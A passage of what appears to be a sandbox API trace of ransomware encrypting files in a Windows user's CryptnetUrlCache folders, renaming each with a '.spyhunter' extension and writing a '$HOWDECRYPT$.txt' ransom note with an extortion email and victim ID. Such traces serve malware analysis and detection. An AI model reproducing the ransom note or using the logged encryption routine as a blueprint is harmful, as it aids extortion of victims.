dwFlags=0x0, lpMem=0x2fec070 | out: hHeap=0x2c0000) returned 1 [0152.139] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eca8 | out: pbBuffer=0x270eca8) returned 1 [0152.139] GetProcessHeap () returned 0x2c0000 [0152.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.139] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270eca0*=0x30) returned 1 [0152.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.140] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned 152 [0152.140] StrStrW (lpFirst="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", lpSrch=".txt") returned 0x0 [0152.140] GetProcessHeap () returned 0x2c0000 [0152.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.140] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec64*=0x190, lpOverlapped=0x0) returned 1 [0152.141] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.141] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x270ec64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec64*=0x190, lpOverlapped=0x0) returned 1 [0152.142] GetProcessHeap () returned 0x2c0000 [0152.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.142] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.142] WriteFile (in: hFile=0xa0, lpBuffer=0x270eca4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec64, lpOverlapped=0x0 | out: lpBuffer=0x270eca4*, lpNumberOfBytesWritten=0x270ec64*=0x4, lpOverlapped=0x0) returned 1 [0152.142] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec64, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec64*=0x30, lpOverlapped=0x0) returned 1 [0152.142] CloseHandle (hObject=0xa0) returned 1 [0152.142] GetProcessHeap () returned 0x2c0000 [0152.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.142] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.spyhunter") returned 162 [0152.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\024823b39fbeaccdb5c06426a8168e99_6d5cab161a1c65362a913d29be09d91b.spyhunter")) returned 1 [0152.143] GetProcessHeap () returned 0x2c0000 [0152.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.144] GetProcessHeap () returned 0x2c0000 [0152.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.144] GetProcessHeap () returned 0x2c0000 [0152.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f22da0 | out: hHeap=0x2c0000) returned 1 [0152.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eca8 | out: pbBuffer=0x270eca8) returned 1 [0152.144] GetProcessHeap () returned 0x2c0000 [0152.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.144] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270eca0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270eca0*=0x30) returned 1 [0152.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.144] GetProcessHeap () returned 0x2c0000 [0152.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.144] GetProcessHeap () returned 0x2c0000 [0152.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45e28 | out: hHeap=0x2c0000) returned 1 [0152.144] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eca0 | out: pbBuffer=0x270eca0) returned 1 [0152.144] GetProcessHeap () returned 0x2c0000 [0152.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.145] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec98*=0x30) returned 1 [0152.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0152.145] GetProcessHeap () returned 0x2c0000 [0152.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.145] GetProcessHeap () returned 0x2c0000 [0152.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45b28 | out: hHeap=0x2c0000) returned 1 [0152.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.147] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0152.147] WriteFile (in: hFile=0xa0, lpBuffer=0x270ebd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x270ebd3*, lpNumberOfBytesWritten=0x270ecfc*=0x127, lpOverlapped=0x0) returned 1 [0152.148] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0152.148] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270ecfc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270ecfc*=0x2ac, lpOverlapped=0x0) returned 1 [0152.148] CloseHandle (hObject=0xa0) returned 1 [0152.148] GetProcessHeap () returned 0x2c0000 [0152.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bcd0 | out: hHeap=0x2c0000) returned 1 [0152.149] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec98 | out: pbBuffer=0x270ec98) returned 1 [0152.149] GetProcessHeap () returned 0x2c0000 [0152.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.149] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec90*=0x30) returned 1 [0152.149] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.149] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned 118 [0152.149] StrStrW (lpFirst="F90F18257CBB4D84216AC1E1F3BB2C76", lpSrch=".txt") returned 0x0 [0152.150] GetProcessHeap () returned 0x2c0000 [0152.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.150] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec54*=0x226, lpOverlapped=0x0) returned 1 [0152.150] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffdda, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.151] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x226, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec54*=0x226, lpOverlapped=0x0) returned 1 [0152.151] GetProcessHeap () returned 0x2c0000 [0152.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.151] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.151] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x270ec94*, lpNumberOfBytesWritten=0x270ec54*=0x4, lpOverlapped=0x0) returned 1 [0152.151] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec54*=0x30, lpOverlapped=0x0) returned 1 [0152.151] CloseHandle (hObject=0xa0) returned 1 [0152.151] GetProcessHeap () returned 0x2c0000 [0152.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.152] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.spyhunter") returned 128 [0152.152] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f90f18257cbb4d84216ac1e1f3bb2c76.spyhunter")) returned 1 [0152.153] GetProcessHeap () returned 0x2c0000 [0152.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.153] GetProcessHeap () returned 0x2c0000 [0152.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.153] GetProcessHeap () returned 0x2c0000 [0152.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc3680 | out: hHeap=0x2c0000) returned 1 [0152.153] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec98 | out: pbBuffer=0x270ec98) returned 1 [0152.153] GetProcessHeap () returned 0x2c0000 [0152.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.153] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec90*=0x30) returned 1 [0152.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned 151 [0152.154] StrStrW (lpFirst="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", lpSrch=".txt") returned 0x0 [0152.154] GetProcessHeap () returned 0x2c0000 [0152.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.154] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec54*=0x64c, lpOverlapped=0x0) returned 1 [0152.246] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff9b4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.246] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x64c, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec54*=0x64c, lpOverlapped=0x0) returned 1 [0152.246] GetProcessHeap () returned 0x2c0000 [0152.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.246] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.246] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x270ec94*, lpNumberOfBytesWritten=0x270ec54*=0x4, lpOverlapped=0x0) returned 1 [0152.246] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec54, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec54*=0x30, lpOverlapped=0x0) returned 1 [0152.247] CloseHandle (hObject=0xa0) returned 1 [0152.247] GetProcessHeap () returned 0x2c0000 [0152.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.247] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.spyhunter") returned 161 [0152.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.spyhunter")) returned 1 [0152.248] GetProcessHeap () returned 0x2c0000 [0152.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.248] GetProcessHeap () returned 0x2c0000 [0152.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.248] GetProcessHeap () returned 0x2c0000 [0152.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7ad0 | out: hHeap=0x2c0000) returned 1 [0152.248] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec90 | out: pbBuffer=0x270ec90) returned 1 [0152.248] GetProcessHeap () returned 0x2c0000 [0152.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.248] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec88*=0x30) returned 1 [0152.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0152.249] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0152.249] GetProcessHeap () returned 0x2c0000 [0152.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.249] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec4c*=0x6e3, lpOverlapped=0x0) returned 1 [0152.257] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.257] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec4c*=0x6e3, lpOverlapped=0x0) returned 1 [0152.258] GetProcessHeap () returned 0x2c0000 [0152.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.258] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.258] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x270ec8c*, lpNumberOfBytesWritten=0x270ec4c*=0x4, lpOverlapped=0x0) returned 1 [0152.259] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec4c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec4c*=0x30, lpOverlapped=0x0) returned 1 [0152.260] CloseHandle (hObject=0xa0) returned 1 [0152.260] GetProcessHeap () returned 0x2c0000 [0152.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.260] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.spyhunter") returned 161 [0152.260] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.spyhunter")) returned 1 [0152.261] GetProcessHeap () returned 0x2c0000 [0152.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.261] GetProcessHeap () returned 0x2c0000 [0152.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.261] GetProcessHeap () returned 0x2c0000 [0152.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7378 | out: hHeap=0x2c0000) returned 1 [0152.261] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec90 | out: pbBuffer=0x270ec90) returned 1 [0152.261] GetProcessHeap () returned 0x2c0000 [0152.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.261] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec88*=0x30) returned 1 [0152.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.262] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 